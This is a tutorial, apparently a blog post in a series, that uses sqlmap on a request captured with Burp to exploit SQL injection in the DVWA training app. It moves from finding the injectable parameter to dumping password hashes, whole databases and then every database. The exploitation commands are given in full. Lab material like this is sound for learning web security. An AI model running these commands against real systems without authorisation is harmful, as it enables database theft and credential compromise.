Last time we accessed the user passwords of DVWA, by exploiting its SQL Injection vulnerability. This time we’ll use sqlmap, a powerful and easy to use SQL injection exploitation tool, in order to dump the whole database. If you noticed, in the SQL injection that I retrieved the user passwords of DVWA, I “guessed” that the column in the users table which has the passwords is called password. What I would normally do in case my guess was incorrect, would be to inject a UNION SQL query on the information schema database of the DBMS, in order to retrieve the tables and the columns of the database that I’m targeting. Of course this is a process that is different per DBMS, and it can be automated. And here’s where sqlmap comes in the picture. sqlmap will automate all this dull process, and through its CLI you can ask to automatically detect the injectable parameters of a web app, ask to dump whole databases, tables or columns and it even has some exploitation and password cracking automation integrated. We’ll not go through it’s exploitation and password cracking features, since we’ll be using metasploit and hashcat for these purposes, but we’ll see how to exploit the same SQL injection that we exploited manually last time, do some information gathering on the server and then dump all its databases 😊
Let’s start by intercepting the HTTP request of the SQL Injection form, using Burp, like we did in the HTTP login brute forcing. Copy the HTTP request body, and save in the a request file:
Now let’s start sqlmap, and give as an arguments the request file that we saved earlier. sqlmap is smart enough to parse and understand the request file, and detect the parameters that it can inspect for SQL injections:
sqlmap -r request
sqlmap already detected that the id parameter might be injectable and vulnerable to XSS. It also guessed (correctly) that the DBMS is MySQL and it asks if we want to skip the payloads for the rest of the DBMs, which we’ll do:
sqlmap says that id is injectable, great! It asks if we want to keep looking for injectable parameters, but we got what we wanted already.
sqlmap exits, but it has saved the information about the request that we analyzed. Now let’s do some information gathering, by asking for the DBMS version (if outdated it can be exploitable), the current database and the current user:
sqlmap -r request --banner --current-user --current-db
Now, let’s see the tables of the dvwa database:
sqlmap -r request -D dvwa --tables
And the columns of the user table:
sqlmap -r request -D dvwa -T users --columns
And let’s dump the user and password column of the users table:
sqlmap -r request -D dvwa -T users -C user,password --dump
But why bothering with columns, when we can dump the whole dvwa database? (in our case the database is very small):
sqlmap -r request -D dvwa --dump
Can you see the stored XSS that we pulled off earlier? 😉
Now let’s list the databases:
sqlmap -r request -D dvwa --dbs
And let’s dump them all:
sqlmap -r request --dump-all
Happy database dumping!